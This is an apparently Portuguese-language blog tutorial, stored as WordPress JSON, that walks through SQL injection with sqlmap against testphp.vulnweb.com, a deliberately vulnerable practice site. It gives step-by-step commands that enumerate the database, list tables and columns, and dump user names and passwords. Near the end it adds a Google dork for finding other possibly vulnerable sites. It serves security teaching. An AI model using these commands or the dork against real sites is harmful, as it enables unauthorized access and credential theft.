{"id":6252,"date":"2013-05-31T09:36:20","date_gmt":"2013-05-31T12:36:20","guid":{"rendered":"http:\/\/www.ethicalhacker.com.br\/site\/?p=6252"},"modified":"2019-07-16T13:04:56","modified_gmt":"2019-07-16T16:04:56","slug":"sql-injection-em-site-didatico-teste-de-vulnerabilidade-em-banco-de-dados-utilizando-sqlmap","status":"publish","type":"post","link":"https:\/\/www.ethicalhacker.com.br\/site\/2013\/05\/exploits\/sql-injection-em-site-didatico-teste-de-vulnerabilidade-em-banco-de-dados-utilizando-sqlmap\/","title":{"rendered":"Sql Injection em site did\u00e1tico &#8211; Teste de Vulnerabilidade em Banco de Dados, utilizando SqlMap."},"content":{"rendered":"<p align=\"JUSTIFY\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">A principal ideia \u00e9, demonstrar como \u00e9 f\u00e1cil fazer testes de vulnerabilidades em banco de dados em sites din\u00e2micos, utilizando a ferramenta sqlmap dentro do backtrack 5 released 3.<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"JUSTIFY\"><span style=\"font-family: arial,serif;\">SQL \u2013 Structured Query Language, traduzindo \u00e9: Linguagem de Consulta Estruturada, desenvolvido na d\u00e9cada de 70 nos laborat\u00f3rios da IBM.<\/span><\/p>\n<p align=\"JUSTIFY\"><span style=\"font-family: arial,serif;\">Essa linguagem tornou-se uma linguagem universal para cria\u00e7\u00e3o, edi\u00e7\u00e3o e inser\u00e7\u00e3o de dados em banco de dados.<\/span><\/p>\n<p align=\"JUSTIFY\"><span style=\"font-family: arial,serif;\">Os sites de internet din\u00e2micos, utilizam banco de dados para diversas aplica\u00e7\u00f5es dentro do site, autenticar usu\u00e1rios, armazenar informa\u00e7\u00f5es sobre clientes e demais necessidades.<\/span><\/p>\n<p align=\"JUSTIFY\"><span style=\"font-family: arial,serif;\">O problema est\u00e1 em algumas falhas dessas aplica\u00e7\u00f5es, os bancos de dados tem que ter algumas restri\u00e7\u00f5es, permiss\u00f5es e c\u00f3digos bem definidas pelo desenvolvedor do banco de dados.<\/span><\/p>\n<p align=\"JUSTIFY\"><span style=\"font-family: arial,serif;\">Para testar essas poss\u00edveis vulnerabilidades, tem algumas ferramentas que verificam se o banco de dados est\u00e1 vulner\u00e1vel, h\u00e1 um tipo de ataque chamado Sql Injection. <\/span><\/p>\n<p align=\"JUSTIFY\"><span style=\"font-family: arial,serif;\">Essa t\u00e9cnica de ataque permite o atacante ver as configura\u00e7\u00f5es do banco de dados, descobrindo o nome do banco de dados, conseguir ver e acessar as informa\u00e7\u00f5es das tabelas, al\u00e9m \u00e9 claro conseguir ver os registros cadastrados nos campos.<\/span><\/p>\n<p align=\"JUSTIFY\"><span style=\"font-family: arial,serif;\">No BackTrack5, tem uma ferramenta que faz esse teste.<\/span><\/p>\n<p align=\"JUSTIFY\"><span style=\"font-family: arial,serif;\">Na internet h\u00e1 um site pr\u00f3prio para voc\u00ea fazer testes das ferramentas que usaremos a seguir.<\/span><\/p>\n<p align=\"JUSTIFY\"><span style=\"font-family: arial,serif;\">Dentro do site, <\/span><span style=\"color: #000080;\"><span style=\"text-decoration: underline;\"><a href=\"http:\/\/testphp.vulnweb.com\/\"><span style=\"font-family: arial,serif;\">http:\/\/testphp.vulnweb.com<\/span><\/a><\/span><\/span><span style=\"font-family: arial,serif;\">, do lado esquerdo h\u00e1 um campo de busca, digite qualquer \u201cpalavra\u201d para pesquisa, o site ir\u00e1 fazer a busca na base de dados, ap\u00f3s copie o link que o site disponibilizou, geralmente \u00e9 mostrado um link como este, <\/span><span style=\"color: #000080;\"><span style=\"text-decoration: underline;\"><a href=\"http:\/\/testphp.vulnweb.com\/search.php?test=query\"><span style=\"font-family: arial,serif;\">http:\/\/testphp.vulnweb.com\/search.php?test=query<\/span><\/a><\/span><\/span><span style=\"font-family: arial,serif;\">, esse link \u00e9 o que ser\u00e1 utilizado pela ferramenta de pentest para verificar a vulnerabilidade.<\/span><\/p>\n<p align=\"JUSTIFY\"><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tela01_site_com_endere\u00e7o_para_colar_no_shell1.jpg\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-6274\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tela01_site_com_endere\u00e7o_para_colar_no_shell1.jpg\"  alt=\"\" width=\"669\" height=\"551\" \/><\/a><\/p>\n<p align=\"JUSTIFY\"><span style=\"font-family: arial,serif;\">Figura 1 \u2013 Site da empresa acunetix \u2013 endere\u00e7o que permite fazer testes de sql injection<\/span><\/p>\n<p align=\"JUSTIFY\"><span style=\"font-family: arial,serif;\">Ap\u00f3s, no seu BackTrack5, entre dentro do diret\u00f3rio que cont\u00e9m o script em Phyton (linguagem de programa\u00e7\u00e3o) para testar a vulnerabilidade.<\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">\/pentest\/database\/sqlmap<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tela02_do_diret\u00f3rio_penteste_database_sqlmap1.jpg\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6275\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tela02_do_diret\u00f3rio_penteste_database_sqlmap1.jpg\"  alt=\"\" width=\"671\" height=\"348\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tela02_do_diret\u00f3rio_penteste_database_sqlmap1.jpg 671w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tela02_do_diret\u00f3rio_penteste_database_sqlmap1-300x155.jpg 300w\" sizes=\"auto, (max-width: 671px) 100vw, 671px\" \/><\/a><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: small;\"><strong>Figura 2 \u2013 Mostra o terminal do BackTrack5 dentro do diret\u00f3rio \/pentest\/database\/sqlmap<\/strong><\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #ff0000;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">digite:<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #ff0000;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">python sqlmap.py -u <\/span><\/span><\/span><span style=\"color: #ff0000;\"><span style=\"font-size: medium;\">http:\/\/testphp.vulnweb.com\/search.php?test=query &#8211;dbs<\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">Explicando a linha de comando:<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">python = executa o compilador do script<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">sqlmap.py = script feito na linguagem python<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">-u = indicador da url do site<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">&#8211;dbs = ap\u00f3s aplica o script procure por database (banco de dados)<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tela03_executando_o_comando_python_sqlmap.py_1.jpg\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-6276\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tela03_executando_o_comando_python_sqlmap.py_1.jpg\"  alt=\"\" width=\"669\" height=\"231\" \/><\/a><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">Figura 3 \u2013 comando para iniciar o script indicando o link completo do site ap\u00f3s a busca<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">Ap\u00f3s o comando acima, \u00e9 encontrada no <\/span><\/span><\/span><span style=\"color: #00000a;\"><span style=\"font-size: medium;\">site de testes o nome do banco.<\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">Chama-se <\/span><\/span><\/span><span style=\"color: #ff0000;\"><span style=\"font-size: medium;\"><strong>acuart<\/strong><\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tela04_apos_comando_o_resultado_com_o_nome_do_banco_encontrado_accuart1.jpg\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-6277\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tela04_apos_comando_o_resultado_com_o_nome_do_banco_encontrado_accuart1.jpg\"  alt=\"\" width=\"670\" height=\"495\" \/><\/a><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-size: medium;\">Figura 4 \u2013 Mostra o nome do banco ap\u00f3s o script explorar a vulnerabilidade<\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">Agora iremos entrar dentro do banco.<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #ff0000;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">Digite:<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #ff0000;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">python sqlmap.py -u <\/span><\/span><\/span><span style=\"color: #ff0000;\"><span style=\"font-size: medium;\">http:\/\/testphp.vulnweb.com\/search.php?test=query -D acuart &#8211; &#8211; tables <\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">Explica\u00e7\u00e3o <\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">-D acuart = entrar dentro da base chamada acurart ( pois poderia ter encontrado outro banco de dados dentro do endere\u00e7o)<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #00000a;\"> <span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">&#8211; &#8211; tables = listar as tabelas que est\u00e1 dentro do banco.<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tela06_lista_das_tabelas_dentro_do_accuart2.jpg\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-6281\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tela06_lista_das_tabelas_dentro_do_accuart2.jpg\"  alt=\"\" width=\"670\" height=\"354\" \/><\/a><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">Figura 5 \u2013 Resultado da solicita\u00e7\u00e3o de listagem de tabelas dentro do banco.<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"JUSTIFY\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">Ap\u00f3s visualizar as tabelas que est\u00e3o dentro do <\/span><\/span><\/span><span style=\"color: #00000a;\"><span style=\"font-size: medium;\">banco, aplica-se o comando para entrar dentro de uma das tabelas. Entraremos dentro da tabela chamada users (para descobrir o nome e senha que os usu\u00e1rios tem dentro do site testphp)<\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #ff0000;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">Digite:<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #ff0000;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">python sqlmap.py -u <\/span><\/span><\/span><span style=\"color: #ff0000;\"><span style=\"font-size: medium;\">http:\/\/testphp.vulnweb.com\/search.php?test=query -D acuart -T users &#8211; &#8211; columns<\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tela07_comando_para_listar_o_conteudo_tabela_users_dentro_do_accuart2.jpg\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-6280\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tela07_comando_para_listar_o_conteudo_tabela_users_dentro_do_accuart2.jpg\"  alt=\"\" width=\"670\" height=\"53\" \/><\/a><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-size: medium;\">Figura 6 \u2013 Comando para listar as colunas da tabela users<\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">Onde o comando users \u00e9 a tabela chamada users e <\/span><\/span><\/span><span style=\"color: #00000a;\"><span style=\"font-size: medium;\">a op\u00e7\u00e3o &#8211; &#8211; colums ir\u00e1 mostrar as colunas da tabela.<\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tela08_resultado_do_comando_que-esta-listando-todos-os-campos-da_tabela_users_dentro_do_accuart1.jpg\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-6282\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tela08_resultado_do_comando_que-esta-listando-todos-os-campos-da_tabela_users_dentro_do_accuart1.jpg\"  alt=\"\" width=\"670\" height=\"453\" \/><\/a><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-size: medium;\">Figura 7 \u2013 Listagem de todos os campos e tipos dos campos da tabela user.<\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">Ap\u00f3s, a tabela users, que est\u00e1 dentro do banco, <\/span><\/span><\/span><span style=\"color: #00000a;\"><span style=\"font-size: medium;\">aplica-se um comando para listar os campos \u201cnome e senha\u201d da tabela users.<\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #ff0000;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">Digite:<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #ff0000;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">python sqlmap.py -u <\/span><\/span><\/span><span style=\"color: #ff0000;\"><span style=\"font-size: medium;\">http:\/\/testphp.vulnweb.com\/search.php?test=query -D acuart -T users &#8211; C &#8216;name,pass&#8217; &#8211; &#8211; dump<\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">Obs.: o sinal &#8216; name,pass&#8217; s\u00e3o aspas simples<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">.<a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tela09_comando-para-listar-na-tela-os-registros-da-tabela-users2.jpg\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-6284\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tela09_comando-para-listar-na-tela-os-registros-da-tabela-users2.jpg\"  alt=\"\" width=\"670\" height=\"61\" \/><\/a><\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">Figura 8 \u2013 Comando para listar o conte\u00fado da tabela user solicitando os campos nome, senha e e-mail cadastrados no banco de dados.<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">Onde o campo &#8216;name&#8217; trar\u00e1 o nome do usu\u00e1rio cadastrado <\/span><\/span><\/span><span style=\"color: #00000a;\"><span style=\"font-size: medium;\">na tabela e o campo \u201cpass\u201d ir\u00e1 mostrar a senha cadastrada para o usu\u00e1rio do site.<\/span><\/span><\/span><\/span><\/p>\n<p align=\"JUSTIFY\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">Lembrando que o site testphp.vulnweb.com \u00e9 um site para que o aluno possa testar t\u00e9cnicas para adentrar em um sistema web por falhas no banco de dados.<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"JUSTIFY\"><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tela12_resultado-do-comando-dump1.jpg\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-6285\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tela12_resultado-do-comando-dump1.jpg\"  alt=\"\" width=\"670\" height=\"480\" \/><\/a><\/p>\n<p align=\"JUSTIFY\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">Figura 9 \u2013 Tela com os campos e seus respectivos registros dentro da tabela users<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"JUSTIFY\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">O banco de dados mostrado, \u00e9 apenas um banco de dados para devidos testes de vulnerabilidade em banco de dados, com suporte a comandos SQL (quase todos aceitam).<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"JUSTIFY\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">Buscar por sites que tenham determinada vulnerabilidade, no site de busca google, voc\u00ea poder\u00e1 utilizar a busca por apenas URL<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #ff0000;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">inurl: *.php?id= <\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"JUSTIFY\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">Essa busca n\u00e3o quer dizer que o site esteja vulner\u00e1vel a esse tipo de ataque, mais pode haver essa possibilidade.<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"JUSTIFY\"><span style=\"font-family: FreeSans,serif;\"><span style=\"font-size: 300%;\"><span style=\"color: #00000a;\"><span style=\"font-family: Liberation Sans,serif;\"><span style=\"font-size: medium;\">Esse tutorial tem por finalidade ser te\u00f3rico e ao mesmo tempo pr\u00e1tico, referente as vulnerabilidades encontradas em banco de dados.<\/span><\/span><\/span><\/span><\/span><\/p>\n\r\n\t\t<div class='author-shortcodes'>\r\n\t\t\t<div class='author-inner'>\r\n\t\t\t\t<div class='author-image'>\r\n\t\t\t<img src='https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/luis1-170263_57x57.png' alt='' \/>\r\n\t\t\t<div class='author-overlay'><\/div>\r\n\t\t<\/div> <!-- .author-image --> \r\n\t\t<div class='author-info'>\r\n\t\t\t<p>By: <a title=\"Lattes\" href=\"http:\/\/buscatextual.cnpq.br\/buscatextual\/visualizacv.do?metodo=apresentar&amp;id=K4131046H1\" target=\"_blank\" rel=\"noopener noreferrer\"><strong><span style=\"color: #800000;\">Luis H. R. Isique<\/span><\/strong><\/a><\/p>\n<p style=\"text-align: justify;\">Especialista em Tecnologia da Informa\u00e7\u00e3o, gradua\u00e7\u00e3o em Processamento de Dados, T\u00e9cnico em Eletroeletr\u00f4nica. Administrador de Redes Gnu\/Linux e Microsoft Windows, Professor de ensino superior, especializa\u00e7\u00e3o e t\u00e9cnico, em disciplinas como redes, ger\u00eancia de redes, certifica\u00e7\u00e3o LPI. Possui certifica\u00e7\u00e3o LPI1, Novel (Certified Linux Administrator), Autodesk Associate e Professional. &#8211; Home Page: <a title=\"academiadeti\" href=\"http:\/\/www.academiadeti.com\" target=\"_blank\" rel=\"noopener noreferrer\"><strong><span style=\"color: #800000;\">www.academiadeti.com<\/span><\/strong><\/a><\/p>\r\n\t\t<\/div> <!-- .author-info --><\/p>\r\n\t\t\t<\/div> <!-- .author-inner -->\r\n\t\t<\/div> <!-- .author-shortcodes -->\n","protected":false},"excerpt":{"rendered":"<p>Aplica\u00e7\u00e3o de Sql Injection em site espec\u00edfico para estudar.<\/p>\n","protected":false},"author":892,"featured_media":6301,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[100,21,101],"tags":[],"class_list":["post-6252","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-diversos","category-exploits","category-tutorial-backtrack"],"_links":{"self":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/6252","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/users\/892"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/comments?post=6252"}],"version-history":[{"count":30,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/6252\/revisions"}],"predecessor-version":[{"id":10483,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/6252\/revisions\/10483"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/media\/6301"}],"wp:attachment":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/media?parent=6252"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/categories?post=6252"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/tags?post=6252"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}